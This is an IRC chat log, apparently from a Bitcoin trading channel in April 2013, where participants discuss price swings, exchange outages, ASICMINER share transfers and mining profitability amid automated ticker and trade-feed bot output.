19 11:25:50 160 = 50% retracement Apr 19 11:26:05 well its making me pissed Apr 19 11:27:10 what is the gox line? Apr 19 11:27:14 ;;bids 0 Apr 19 11:27:25 There are currently 60227293 bitcoins demanded at or over 0.0 USD, worth 21650645.4959 USD in total. | Data vintage: 0.0126 seconds Apr 19 11:27:39 yeah 21 million on the book, and with 50 million more to come... Apr 19 11:27:47 we should see $260 again soon Apr 19 11:29:25 that being said we should retest 100 first Apr 19 11:29:34 ;;bids 100 Apr 19 11:29:36 There are currently 26588.781 bitcoins demanded at or over 100.0 USD, worth 2957235.9955 USD in total. | Data vintage: 0.0055 seconds Apr 19 11:36:14 [BTCTC] [ASICMINER-PT] 10 @ 1.2 = 12 BTC [+] Apr 19 11:36:23 [BTCTC] [ASICMINER-PT] 1 @ 1.2298 BTC [+] Apr 19 11:36:26 [BTCTC] [ASICMINER-PT] 10 @ 1.25 = 12.5 BTC [+] Apr 19 11:36:36 fuck i't repeating... as i'm going to travel bitcoin's going haywire again Apr 19 11:36:51 and i don't feel like trying to speculate from train Apr 19 11:36:58 on a phone Apr 19 11:37:18 give me your account data and i'll do it for you Apr 19 11:37:36 ;D Apr 19 11:37:37 lol Apr 19 11:38:14 surely you can afford to speculate on a laptop Apr 19 11:39:10 jurov when is your arrival Apr 19 11:39:18 21:25 :( Apr 19 11:39:22 wtf is going on at bitstamp Apr 19 11:39:35 aww Apr 19 11:39:47 Scrat whats up with kids with css skills Apr 19 11:40:13 i am a kid with css skills Apr 19 11:40:17 too Apr 19 11:40:54 yea i can do it on laptop... but i prefer not to, the concentration isn't there Apr 19 11:41:52 Scrat ya but you dont run bitstamp Apr 19 11:42:12 imagine the look on nearby passengers faces when you tell them "i just made 5k, how does that make you feel, miserable plebians?" Apr 19 11:45:18 "They why are you on the train asshole?" is the response I'd expect. Apr 19 11:45:33 srsly Scrat whats up with bitstamp Apr 19 11:45:39 something new? Apr 19 11:45:39 can't afford my own train yet, bro Apr 19 11:46:36 kakobrekla: nah just a spam of orders ive never seen before, then it stopped working for a minute Apr 19 11:47:12 not to self if you see a price you want take it Apr 19 11:47:18 dont play the limit game and dont get a fill Apr 19 11:49:03 [HAVELOCK] [VTX] 6 @ 0.44444 = 2.6666 BTC [-] Apr 19 11:54:01 gox down? Apr 19 11:54:22 yep Apr 19 11:54:25 502 Bad Gateway Apr 19 11:54:26 hmmm Apr 19 11:55:03 [HAVELOCK] [VTX] 3 @ 0.44444 = 1.3333 BTC [-] Apr 19 12:14:38 free fall Apr 19 12:16:04 yay Apr 19 12:16:34 nothing unusual in bitcoinland Apr 19 12:17:19 ;;ticker Apr 19 12:17:19 BTCUSD ticker | Best bid: 122.99999, Best ask: 123.00000, Bid-ask spread: 0.00001, Last trade: 122.99999, 24 hour volume: 279868.88069221, 24 hour low: 90.50370, 24 hour high: 136.43210, 24 hour vwap: 111.46245 Apr 19 12:17:44 that's a weak fall Apr 19 12:17:57 hit 108 on stamp Apr 19 12:17:59 for a sec Apr 19 12:31:29 does someone now what happens when you deposit funds to a mount gox account from a different bank account as registered by mount gox? Apr 19 12:38:15 ask in #mtgox Apr 19 12:38:40 bitconcharts feed crapping out Apr 19 12:38:54 cant trade, love the volatility but so risky when feed and sites can go down any second Apr 19 12:39:09 if not the sites then the bitcoin Apr 19 13:00:57 [BTCTC] [ASICMINER-PT] 5 @ 1.25 = 6.25 BTC [+] Apr 19 13:12:18 jimbo2k, the account should bare your same name otherwise you are in for some hassle Apr 19 13:13:05 hm it doesnt Apr 19 13:13:17 but what is the problem? Apr 19 13:13:26 i didnt read anythong according to such a rule Apr 19 13:13:46 i always thought deposits can be made from any bank account Apr 19 13:14:00 i read about it ages ago and it can't of gotten any more lenient Apr 19 13:15:10 the problem is that the origin of the money is not clearly tied to you and that you could ask people to pay you on your mtgox account rather than your own Apr 19 13:15:18 13:13.57 ( idioterna ) http://i.imgur.com/SywZ7Uk.jpg Apr 19 13:15:38 [BTCTC] [BASIC-MINING] 2 @ 0.44 = 0.88 BTC [+] Apr 19 13:15:50 which cannot be very AML friendly Apr 19 13:18:13 [BTCTC] [MININGCO.ETF] 1 @ 0.64 BTC [+] Apr 19 13:18:51 [MPEX] [S.MPOE] 18800 @ 0.00069844 = 13.1307 BTC [-] Apr 19 13:19:32 [BTCTC] [ASICMINER-PT] 1 @ 1.3355 BTC [+] Apr 19 13:20:20 [BTCTC] [PAJKA.BOND] 1 @ 0.1005 BTC [+] Apr 19 13:28:50 jurov, I just noticed the 0.05 extra, thanks (I was only kidding though) :) Apr 19 13:31:54 ;;bids 0 Apr 19 13:31:57 There are currently 60211375 bitcoins demanded at or over 0.0 USD, worth 21151412.4678 USD in total. | Data vintage: 0.0123 seconds Apr 19 13:33:15 martial law in boston Apr 19 13:40:23 ;;asks 0 Apr 19 13:40:25 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. | Data vintage: 0.0023 seconds Apr 19 13:40:49 ;;asks 999999999999 Apr 19 13:40:49 There are currently 104231.83 bitcoins offered at or under 999999999999.0 USD, worth 1.48292549668e+12 USD in total. | Data vintage: 24.5143 seconds Apr 19 13:44:52 ;;ticker Apr 19 13:44:53 BTCUSD ticker | Best bid: 121.82204, Best ask: 122.74999, Bid-ask spread: 0.92795, Last trade: 121.82204, 24 hour volume: 300854.17439804, 24 hour low: 90.50370, 24 hour high: 136.43210, 24 hour vwap: 112.39188 Apr 19 13:47:23 wtf was this bitcoinity flash Apr 19 13:47:32 neo fighting mr smith Apr 19 13:47:40 O_o Apr 19 13:50:55 did we go 135 at 4:10 a?m EST Apr 19 13:50:58 nice. Apr 19 13:51:02 should set a set. Apr 19 13:51:05 a sell Apr 19 13:57:31 [MPEX] [S.MPOE] 14200 @ 0.00070052 = 9.9474 BTC [+] Apr 19 13:57:31 damientrog, i can subtract them easily if you don't want =D Apr 19 13:59:41 [BTCTC] [CRYPTO-TRADE] 88 @ 0.199 = 17.512 BTC [+] Apr 19 13:59:42 lol just now i found that scrat's "miserable plebians" suggestion Apr 19 14:00:03 :) Apr 19 14:19:07 ;;bids 0 Apr 19 14:19:07 There are currently 60264295 bitcoins demanded at or over 0.0 USD, worth 21325517.3679 USD in total. | Data vintage: 4.2115 seconds Apr 19 14:20:43 [MPEX] [S.DICE] 1850 @ 0.00301322 = 5.5745 BTC [-] Apr 19 14:22:34 ;;bid 50 Apr 19 14:22:34 Error: "bid" is not a valid command. Apr 19 14:22:36 ;;bids 50 Apr 19 14:22:38 There are currently 179545.9 bitcoins demanded at or over 50.0 USD, worth 13315794.6706 USD in total. | Data vintage: 0.0084 seconds Apr 19 14:25:18 [MPEX] [S.MPOE] 4800 @ 0.00069844 = 3.3525 BTC [-] Apr 19 14:31:44 [BTCTC] [S.DICE-PT] 10 @ 0.00409 = 0.0409 BTC [-] Apr 19 14:32:57 [BTCTC] [S.DICE-PT] 58 @ 0.0041 = 0.2378 BTC [+] Apr 19 14:55:03 [HAVELOCK] [VTX] 2 @ 0.44445 = 0.8889 BTC [+] Apr 19 15:05:37 jurov, no that's okay I am happy as it is :) Apr 19 15:22:06 [MPEX] [S.MPOE] 6300 @ 0.00070052 = 4.4133 BTC [+] Apr 19 15:22:07 [MPEX] [S.MPOE] 10800 @ 0.00070082 = 7.5689 BTC [+] Apr 19 15:36:58 [MPEX] [S.MPOE] 2800 @ 0.00070082 = 1.9623 BTC [+] Apr 19 15:37:00 [MPEX] [S.MPOE] 15250 @ 0.00070326 = 10.7247 BTC [+] Apr 19 16:23:26 is teh bot down? Apr 19 16:30:37 [BTCTC] [GSDPT] 45 @ 0.003669 = 0.1651 BTC [-] Apr 19 16:30:46 [BTCTC] [GSDPT] 76 @ 0.003668 = 0.2788 BTC [-] Apr 19 16:35:08 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 19 16:37:59 [MPEX] [O.USD.C092T] 4 @ 0.6039017 = 2.4156 BTC [+] Apr 19 16:38:46 ;;bids 0 Apr 19 16:38:48 There are currently 94092907 bitcoins demanded at or over 0.0 USD, worth 21216702.6403 USD in total. | Data vintage: 0.0114 seconds Apr 19 16:39:01 !bids 100.5 Apr 19 16:39:14 ;;bids 100.5 Apr 19 16:39:15 There are currently 20934.291 bitcoins demanded at or over 100.5 USD, worth 2234703.88907 USD in total. | Data vintage: 26.2903 seconds Apr 19 16:40:21 ;;market buy 20900 Apr 19 16:40:21 A market order to buy 20900 bitcoins right now would take 2712688.6673 USD and would take the last price up to 140.0000 USD, resulting in an average price of 129.7937 USD/BTC. | Data vintage: 92.6804 seconds Apr 19 16:40:45 [MPEX] [S.MPOE] 4000 @ 0.00070238 = 2.8095 BTC [-] Apr 19 16:56:41 [BTCTC] [GSDPT] 74 @ 0.003668 = 0.2714 BTC [-] Apr 19 16:59:23 [MPEX] [S.MPOE] 8850 @ 0.00070326 = 6.2239 BTC [+] Apr 19 17:00:03 [HAVELOCK] [HIM] 1 @ 1.75000001 BTC [-] Apr 19 17:01:02 [HAVELOCK] [HIM] 4 @ 1.75 = 7 BTC [-] Apr 19 17:10:35 [MPEX] [S.MPOE] 1376 @ 0.00070612 = 0.9716 BTC [+] Apr 19 17:10:36 [MPEX] [S.MPOE] 7600 @ 0.00070238 = 5.3381 BTC [-] Apr 19 17:10:39 [MPEX] [S.MPOE] 11624 @ 0.00069844 = 8.1187 BTC [-] Apr 19 17:28:35 ozcoin hacked? Apr 19 17:29:18 vircurex down Apr 19 17:33:41 why do so few people use therocktrading actually? Apr 19 17:34:14 never had any troubles there, but maybe there's something I don't know about them Apr 19 17:34:17 [BTCTC] [ASICMINER-PT] 1 @ 1.21 BTC [+] Apr 19 17:35:36 [BTCTC] [BTC-BOND] 70 @ 0.01 = 0.7 BTC [+] Apr 19 17:42:42 [MPEX] [S.MPOE] 16283 @ 0.00071374 = 11.6218 BTC [+] Apr 19 18:21:04 [MPEX] [S.MPOE] 19950 @ 0.00071374 = 14.2391 BTC [+] Apr 19 18:28:15 [BTCTC] [S.DICE-PT] 11 @ 0.00391 = 0.043 BTC [-] Apr 19 18:48:04 [HAVELOCK] [VTX] 49 @ 0.4443333 = 21.7723 BTC [-] Apr 19 18:51:03 [HAVELOCK] [VTX] 1 @ 0.39 BTC [-] Apr 19 18:51:05 [HAVELOCK] [VTX] 5 @ 0.385 = 1.925 BTC [-] Apr 19 18:51:06 [HAVELOCK] [VTX] 8 @ 0.380001 = 3.04 BTC [-] Apr 19 18:51:07 [HAVELOCK] [VTX] 7 @ 0.38 = 2.66 BTC [-] Apr 19 18:54:04 [HAVELOCK] [VTX] 25 @ 0.444333 = 11.1083 BTC [+] Apr 19 18:54:05 [HAVELOCK] [VTX] 1 @ 0.444333 BTC [+] Apr 19 18:54:06 [HAVELOCK] [VTX] 1 @ 0.444333 BTC [+] Apr 19 18:59:04 [HAVELOCK] [VTX] 8 @ 0.443 = 3.544 BTC [-] Apr 19 19:13:30 [BTCTC] [BTC-BOND] 180 @ 0.01 = 1.8 BTC [+] Apr 19 19:26:22 [BTCTC] [ASICMINER-PT] 1 @ 1.3199 BTC [+] Apr 19 19:30:23 ;;seen smickles Apr 19 19:30:24 smickles was last seen in #bitcoin-assets 2 weeks, 1 day, 0 hours, 47 minutes, and 49 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 19 19:34:31 ISS space walk in progress: http://www.nasa.gov/multimedia/nasatv/index.html Apr 19 19:41:44 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Apr 19 19:46:25 ;;ticker Apr 19 19:46:25 BTCUSD ticker | Best bid: 117.80001, Best ask: 117.90000, Bid-ask spread: 0.09999, Last trade: 117.90000, 24 hour volume: 315448.27814126, 24 hour low: 95.00000, 24 hour high: 136.43210, 24 hour vwap: 114.46986 Apr 19 19:47:51 ;;bids 0 Apr 19 19:47:51 There are currently 54178497 bitcoins demanded at or over 0.0 USD, worth 21587570.9593 USD in total. | Data vintage: 83.1350 seconds Apr 19 19:48:03 ;;bids 100.5 Apr 19 19:48:03 There are currently 22916.842 bitcoins demanded at or over 100.5 USD, worth 2457911.01905 USD in total. | Data vintage: 95.2615 seconds Apr 19 19:49:39 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Apr 19 19:57:56 [BTCTC] [ASICMINER-PT] 3 @ 1.3 = 3.9 BTC [-] Apr 19 19:59:36 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199 = 0.796 BTC [+] Apr 19 20:00:03 [BTCTC] [BITVPS] 3 @ 0.00236 = 0.0071 BTC [-] Apr 19 20:00:18 [BTCTC] [BITVPS] 97 @ 0.00236 = 0.2289 BTC [-] Apr 19 20:10:56 Erm... is mpex option expiry today or next Friday? Apr 19 20:11:04 http://organofcorti.blogspot.com/2013/04/913-asic-choices-asic-earnings-17-april.html Apr 19 20:11:19 interesting projections Apr 19 20:24:26 [BTCTC] [CRYPTO-TRADE] 6 @ 0.199 = 1.194 BTC [+] Apr 19 20:24:28 [MPEX] [S.MPOE] 12608 @ 0.0006984 = 8.8054 BTC [-] Apr 19 20:24:30 [BTCTC] [CRYPTO-TRADE] 131 @ 0.2 = 26.2 BTC [+] Apr 19 20:27:24 [BTCTC] [COGNITIVE] 5 @ 0.178878 = 0.8944 BTC [+] Apr 19 20:30:38 [BTCTC] [BASIC-MINING] 17 @ 0.44 = 7.48 BTC [+] Apr 19 20:32:25 unbalanced, next week Apr 19 20:33:07 ;;bids 0 Apr 19 20:33:09 There are currently 54189605 bitcoins demanded at or over 0.0 USD, worth 21429807.1095 USD in total. | Data vintage: 0.0117 seconds Apr 19 20:33:22 ;;next Apr 19 20:33:23 expecting to test 110, 100 | resistance: 123 | lower buy targets: 96-100, 86 | updated by OneFixt at Apr 19 2013, 9:43 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 7 hours, 50 minutes, and 20 seconds ago Apr 19 20:41:30 ;;genrate 10000 Apr 19 20:41:31 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 19 20:48:01 [BTCTC] [BASIC-MINING] 9 @ 0.44 = 3.96 BTC [+] Apr 19 20:48:09 [BTCTC] [BASIC-MINING] 2 @ 0.45 = 0.9 BTC [+] Apr 19 20:48:19 increase your calm john spartan Apr 19 20:49:54 ;;bc,stats Apr 19 20:49:57 Current Blocks: 232133 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1722 blocks | Next Difficulty In About: 2 weeks, 0 days, 5 hours, 33 minutes, and 13 seconds | Next Difficulty Estimate: 9019350.06694 | Estimated Percent Change: 0.50203 Apr 19 20:50:11 Thanks bitesak, thought so but I've been wrong about nearly everything else so far so I thought no harm in asking. Apr 19 20:51:11 One more week for bitcoin to hit either $400 or $40... if it would just pick a direction already and stick with it, please. Apr 19 21:04:03 [HAVELOCK] [VTX] 1 @ 0.41 BTC [-] Apr 19 21:04:05 tiberiusiv returns! Apr 19 21:04:09 we missed you Apr 19 21:04:13 !! Apr 19 21:04:28 hey tiberiusiv hows it going? Apr 19 21:05:04 [MPEX] [S.DICE] 1100 @ 0.00297475 = 3.2722 BTC [-] Apr 19 21:06:09 any thoughts on this weeks btc price? Apr 19 21:06:12 [BTCTC] [S.DICE-PT] 24 @ 0.00391 = 0.0938 BTC [-] Apr 19 21:06:16 [BTCTC] [S.DICE-PT] 50 @ 0.0039 = 0.195 BTC [-] Apr 19 21:06:36 [BTCTC] [S.DICE-PT] 95 @ 0.00383 = 0.3639 BTC [-] Apr 19 21:06:51 [BTCTC] [S.DICE-PT] 200 @ 0.00382 = 0.764 BTC [-] Apr 19 21:06:54 [BTCTC] [S.DICE-PT] 100 @ 0.0038 = 0.38 BTC [-] Apr 19 21:06:57 [BTCTC] [S.DICE-PT] 100 @ 0.0038 = 0.38 BTC [-] Apr 19 21:07:05 [BTCTC] [S.DICE-PT] 81 @ 0.003724 = 0.3016 BTC [-] Apr 19 21:07:08 [BTCTC] [S.DICE-PT] 10 @ 0.003721 = 0.0372 BTC [-] Apr 19 21:07:11 [BTCTC] [S.DICE-PT] 1 @ 0.00327 BTC [-] Apr 19 21:07:15 [BTCTC] [S.DICE-PT] 13 @ 0.00325 = 0.0423 BTC [-] Apr 19 21:07:26 [BTCTC] [S.DICE-PT] 366 @ 0.00323 = 1.1822 BTC [-] Apr 19 21:10:03 how so? Apr 19 21:10:03 i agree Apr 19 21:10:30 unfortunaately the infrastructure is crumbling.. Apr 19 21:10:36 :) Apr 19 21:10:50 "never" might be going too far Apr 19 21:11:11 but it looks a lot less likely for the short- medium-term Apr 19 21:11:13 burn baby burn! get some professionals in here Apr 19 21:11:29 whereas we thought the bubble would double burst, it may not Apr 19 21:11:44 are you guys looking at the volume? lol Apr 19 21:11:55 support is falling rapidly Apr 19 21:12:01 we'll have to see if this latest return to normal is a "return to normal" or not Apr 19 21:13:18 can we trust btc-e ? Apr 19 21:13:47 i do agree that a LOT of people are ready to pay more than $59 on a drop Apr 19 21:15:20 there's still the big boys that soaked up at 50s Apr 19 21:16:17 I doubt it Apr 19 21:16:20 doubtful, they need that btc to crash it down again in the future Apr 19 21:16:36 and interest in Bitcoins is fading Apr 19 21:17:37 No... because this is not a freakin stock. There's no dividend in holding. Apr 19 21:17:45 No interest, no buyers, no value. Apr 19 21:18:21 The influx lag after the news... Apr 19 21:18:45 News mean everything in a bubble cycle Apr 19 21:18:58 It's a major part Apr 19 21:20:30 No interest, no buyers, no value. Apr 19 21:20:37 that's the thing. It's rationalizing the rise with out of whack supposition about some fantastic events that will keep it going up up up. Apr 19 21:20:38 market works better is btw price is stable Apr 19 21:20:42 so there's value Apr 19 21:20:49 i think the answer is in between Apr 19 21:20:49 if btc* Apr 19 21:20:53 news has an affect Apr 19 21:21:04 but i suspect much less of an affect than we attributed Apr 19 21:21:16 ive gone tinfoil hat on the matter Apr 19 21:21:22 i think bubbles are built Apr 19 21:21:25 the rise to 15 USD/BTC was good. The rise to over 20 was fueled by news. Apr 19 21:21:27 by manipulators Apr 19 21:21:58 There was news Apr 19 21:22:01 and manipulation Apr 19 21:22:35 The price started to raise around november/december slowly. Apr 19 21:22:43 Fueled by the BTC community Apr 19 21:24:17 the first news were way before that Apr 19 21:25:24 The news didn't start at 50 Apr 19 21:25:36 they started earlier, on actual good news. Apr 19 21:27:08 Yeah, but news didn't start at 50. They started in 2012 with VC funds/ Wordpress accepting Bitcoins, etc. Apr 19 21:27:13 Price started to creep up Apr 19 21:27:21 and the more it rose, the more news there was Apr 19 21:27:54 Goes from legit news in smaller outlets to progressively making the headlines Apr 19 21:28:11 They lag it but also fuels it Apr 19 21:28:38 They appear after and push it further up, bringing even more news in a cycle. Until a bubble pops Apr 19 21:28:47 at which points news cover that new interesting topic Apr 19 21:28:59 and usually forget about it and go on to something else. Apr 19 21:29:05 tiberiusiv : are you trolling or do you really believe what you're saying Apr 19 21:29:10 news diminishes afterward Apr 19 21:29:13 poor name Apr 19 21:29:19 Nam* Apr 19 21:29:39 do you need a troll rope to pull you from the dungeon? Apr 19 21:30:09 It's widely recognized that news fuel bubbles, not just lag it. News can have a huge impact on the price of any currency/commodity/stock Apr 19 21:30:24 lol Apr 19 21:30:31 okay now it's obvious Apr 19 21:30:41 you had me going for a while tib Apr 19 21:30:45 you went too far there Apr 19 21:30:52 Nothing that is, is what it is, for Tib Apr 19 21:31:11 InstantBTC just stop reading. let your eyes glaze over. you'll thank me Apr 19 21:31:24 [MPEX] [S.MPOE] 11150 @ 0.00070028 = 7.8081 BTC [+] Apr 19 21:32:04 jcpham lol I feel my blood pressure returning to normal Apr 19 21:32:14 http://wikileaks.org/Transcript-Meeting-Assange-Schmidt#688 Apr 19 21:32:18 listen tib, what you don't understand is that for a bubble to be a bubble, a lot of people have to own bitcoin Apr 19 21:32:19 nice read Apr 19 21:32:32 :) Apr 19 21:32:37 just checking Apr 19 21:32:42 eric and jullian talking about bitcoin Apr 19 21:33:14 like a tsunami is just a shift in the tide? Apr 19 21:34:06 was the Great Depression a depression? Apr 19 21:34:07 [BTCTC] [GSDPT] 40 @ 0.00368 = 0.1472 BTC [+] Apr 19 21:34:15 [BTCTC] [GSDPT] 100 @ 0.00367 = 0.367 BTC [-] Apr 19 21:35:03 Satoshidice.com shows an expiry of next year in whois... so I guess they've got their payment in and will be back online soon? Apr 19 21:35:14 Anyone have any info? Apr 19 21:35:25 they are up from what I can see Apr 19 21:35:33 either that or I'm loading a cached version Apr 19 21:35:43 http://www.investopedia.com/terms/b/bubble.asp Apr 19 21:36:01 tiberiusiv, so is the USD a bubble? Apr 19 21:36:14 are bubbles even bubbles? Apr 19 21:36:20 lol what? Apr 19 21:36:58 it's not a bubble, just a soap and water Apr 19 21:37:11 tiberiusiv, you're saying that the USD has been deflating for 80 years Apr 19 21:37:22 do you know the definition for deflation? Apr 19 21:37:36 he means a deflating bubble Apr 19 21:37:41 except Apr 19 21:37:46 bubbles dont DEFLATE! Apr 19 21:37:50 the POP! Apr 19 21:37:53 they* Apr 19 21:38:06 tiberiusiv, what timezone are you in? Apr 19 21:38:13 otherwise call them Balloons, or Tires Apr 19 21:38:17 not bubbles Apr 19 21:39:16 a bubble isn't a very descriptive term actually Apr 19 21:39:21 okay I'll be back in like 8-10 hours or so Apr 19 21:39:23 was fun Apr 19 21:39:59 50 million for how many BTC? If 2 million, that's 25 USD/BTC Apr 19 21:40:10 Probably more than that readily available Apr 19 21:40:36 Of course there's not Apr 19 21:40:53 But mass adoption doesn't appear overnight... Apr 19 21:41:56 [MPEX] [S.MPOE] 5292 @ 0.0006984 = 3.6959 BTC [-] Apr 19 21:41:57 [MPEX] [S.MPOE] 25000 @ 0.000695 = 17.375 BTC [-] Apr 19 21:41:59 [MPEX] [S.MPOE] 14350 @ 0.00069362 = 9.9534 BTC [-] Apr 19 21:42:05 [MPEX] [S.MPOE] 913 @ 0.0006932 = 0.6329 BTC [-] Apr 19 21:44:14 I agree in 5-10 years, Bitcoins might just be incredibly higher than 266 Apr 19 21:44:55 Maybe even earlier if we see another spike... I hope not however Apr 19 21:48:38 because it went crashing down as expected... because that's the exact definition of a bubble...a sharp, unsustainable rise that is followed by a violent correction Apr 19 21:48:54 Doesn't mean the price can't start going up again. Apr 19 21:52:13 I'm not saying 50-60 wasn't a good entry point... Apr 19 21:52:57 a huge run up followed by a correction is the definition of a bubble Apr 19 21:53:09 doesn't need to return to where it started Apr 19 21:54:18 [BTCTC] [COG.F] 1 @ 2.499 BTC [+] Apr 19 21:54:27 I got hundreds of BTC thank you. And I work from home, thank you. Apr 19 21:54:53 yes >.> Apr 19 21:54:59 [MPEX] [S.MPOE] 13700 @ 0.0006932 = 9.4968 BTC [-] Apr 19 21:55:43 Oh, I'd like to see your 1000 BTC =) Apr 19 22:03:10 [MPEX] [S.MPOE] 15750 @ 0.0006932 = 10.9179 BTC [-] Apr 19 22:09:33 [BTCTC] [COG.F] 1 @ 2.499 BTC [+] Apr 19 22:16:05 not sure i want anyone to know whther i'm smart or stupid Apr 19 22:16:35 perceived intelligence is a threat to some people Apr 19 22:16:45 i'm much more subversive than that Apr 19 22:28:42 mircea_popescu :withdraw process please Apr 19 22:29:36 Namworld: heh. Apr 19 22:29:58 it doesnt look like tman or 18dew are going to pay Apr 19 22:30:07 so thats 6 shares of asicminer not being sold Apr 19 22:31:08 [BTCTC] [RSM] 17 @ 0.0049 = 0.0833 BTC [+] Apr 19 22:31:10 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 19 22:41:41 another hour and 20 minutes to go on the asicminer blade auction Apr 19 22:46:42 ;;genrate 60000 Apr 19 22:46:43 The expected generation output, at 60000.0 Mhps, given difficulty of 8974296.01489, is 3.36231286953 BTC per day and 0.140096369564 BTC per hour. Apr 19 22:46:52 ;;calc 6 * 83 Apr 19 22:46:52 498 Apr 19 22:50:42 wow. ~11GH/s for 70 BTC. That seems crazy. Apr 19 22:51:46 ;;genrate 11000 Apr 19 22:51:47 The expected generation output, at 11000.0 Mhps, given difficulty of 8974296.01489, is 0.616424026081 BTC per day and 0.02568433442 BTC per hour. Apr 19 22:52:37 ;;nethash Apr 19 22:52:38 63272.2000576 Apr 19 23:06:48 Diablo-D3 , when are you doin the share transfer . expected timeframe? Apr 19 23:07:40 jborkl: it'll be done before next dividend payment Apr 19 23:07:54 Thanks Apr 19 23:09:28 good news is only 6 shares were abandoned Apr 19 23:10:22 Yeah, much better than I expected - most people on BCT are at bets flakey Apr 19 23:10:28 best Apr 19 23:10:53 Im offering to sell them at 1.2 each whoever makes the bid in the thread first Apr 19 23:10:58 https://bitcointalk.org/index.php?topic=179065.0 Apr 19 23:11:41 [MPEX] [S.MPOE] 12650 @ 0.00069813 = 8.8313 BTC [+] Apr 19 23:12:48 I am sure they will go fast, I have absolutely everything tied up or I would take them off your hands Apr 19 23:13:07 Namworld: heres your chance! Apr 19 23:15:30 !last m s.bbet Apr 19 23:15:31 Last trade for S.BBET on MPEX was at 0.00175 BTC [-] Apr 19 23:19:26 diablo pm send here Apr 19 23:19:50 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] Apr 19 23:21:22 how do you transfer stocks ? Apr 19 23:22:07 is it all done on bitfuner ? Apr 19 23:22:12 bitfunder* ? Apr 19 23:22:40 by mail imo Apr 19 23:30:06 sharktopuz: with asicminer, its done via friedcat Apr 19 23:30:14 he keeps a ledger of all owners Apr 19 23:32:52 is that who runs bitfuner ? Apr 19 23:32:59 no, its who owns asicminer Apr 19 23:33:44 Ukto owns Bitfunder Apr 19 23:36:21 hey mircea_popescu, can I get to mpex historical transactions through the RSS feed? is there a query parameter for date? Apr 19 23:38:47 I wonder if I should make a bid for 6 of these Apr 19 23:42:34 [MPEX] [S.MPOE] 11953 @ 0.00070028 = 8.3704 BTC [+] Apr 19 23:42:36 [MPEX] [S.MPOE] 3647 @ 0.00070138 = 2.5579 BTC [+] Apr 19 23:46:09 You want a opinion Diablo-D3 , or was that rhetorical? Apr 19 23:46:40 well Apr 19 23:46:42 the price is pretty high Apr 19 23:47:05 ;;calc 4377*25.5*.001587 Apr 19 23:47:05 177.1306245 Apr 19 23:47:21 ;;calc 700/177 Apr 19 23:47:21 3.95480225989 Apr 19 23:47:32 they'd take about a year to pay off Apr 19 23:47:34 months to pay back, at current network rate Apr 19 23:47:34 but run FOREVER Apr 19 23:47:40 jborkl: yeah thats useless Apr 19 23:47:47 depends Apr 19 23:47:51 you have to use a predicted profit graph Apr 19 23:47:58 because 200TH are coming online before july Apr 19 23:48:05 the current network speed is about 70 Apr 19 23:48:11 I would expect 8 months Apr 19 23:48:21 ;;nethash Apr 19 23:48:21 the 200TH belongs to asicminer Apr 19 23:48:21 63288.3011151 Apr 19 23:48:31 Im not including future avalon or if bfl ever ships Apr 19 23:48:47 given those two included, I'll make about 2BTC per GH before august 1st. Apr 19 23:49:18 at 70 per unit, I would expect 8 months Apr 19 23:49:33 too much for me, but w\e Apr 19 23:49:44 yeah, Im doing 12 months on the very outside Apr 19 23:49:51 since BFL will never ship, it could be as little as 6 Apr 19 23:50:15 yes, Static network rate = 4 = 120 th = 8 months Apr 19 23:50:22 4 months Apr 19 23:50:32 we know it will not be static though Apr 19 23:51:17 I dunno, I'm seriously considering it Apr 19 23:58:18 theres another auction next week too afaik Apr 19 23:59:44 I know Apr 20 00:00:52 [MPEX] [S.MPOE] 4787 @ 0.00070138 = 3.3575 BTC [+] Apr 20 00:04:32 I decided not to bid. Apr 20 00:04:39 future hashpower is just too uncertain Apr 20 00:10:21 [MPEX] [S.MPOE] 9400 @ 0.00070138 = 6.593 BTC [+] Apr 20 00:14:36 [MPEX] [S.MPOE] 2266 @ 0.00070138 = 1.5893 BTC [+] Apr 20 00:14:38 [MPEX] [S.MPOE] 884 @ 0.00070298 = 0.6214 BTC [+] Apr 20 00:16:00 is there any good info on building a custom rig ? Apr 20 00:16:11 rather then buying avalon / BFL ? Apr 20 00:19:03 ;;estimate 60000 Apr 20 00:19:03 (estimate takes no arguments) -- Shows next difficulty estimate. Apr 20 00:19:18 ;;genrate 60000 Apr 20 00:19:19 The expected generation output, at 60000.0 Mhps, given difficulty of 8974296.01489, is 3.36231286953 BTC per day and 0.140096369564 BTC per hour. Apr 20 00:25:05 [BTCTC] [PAJKA.BOND] 50 @ 0.1 = 5 BTC [-] Apr 20 00:35:16 ;;seen tiberiusiv Apr 20 00:35:16 tiberiusiv was last seen in #bitcoin-assets 2 hours, 40 minutes, and 19 seconds ago: namworld the rule in here was unless you had minimum 1000 BTC you werent allowed to speak when the smart people were talking Apr 20 00:35:41 tiberiusiv: i have 1000btc now Apr 20 00:35:45 lol Apr 20 00:35:58 Bugpowder: waddup homie? Apr 20 00:36:03 makin dat paypuh? Apr 20 00:36:13 wish I had put up some asks before I went to bed Apr 20 00:36:27 Woulda made hella loot last night Apr 20 00:36:33 i know how you feel! Apr 20 00:36:44 stupid stupid Apr 20 00:36:59 i wish I had put up bids the night before when I went to sleep Apr 20 00:37:08 Now I have a little too much exposure for comfort, and can't exit cleanly Apr 20 00:37:25 exposure where? Apr 20 00:37:30 in BTC Apr 20 00:37:40 oh Apr 20 00:37:47 you had 30% i thougjt Apr 20 00:37:54 !ticker m ^oix Apr 20 00:37:54 No I sold it all Apr 20 00:37:56 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 24.03032819 / 88.3616141 / 232.26557649 (9 shares, 7.82 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 20 00:37:59 and have been trading it Apr 20 00:38:01 oh wow Apr 20 00:38:04 currently 50/50 Apr 20 00:38:15 all you s.dice and all 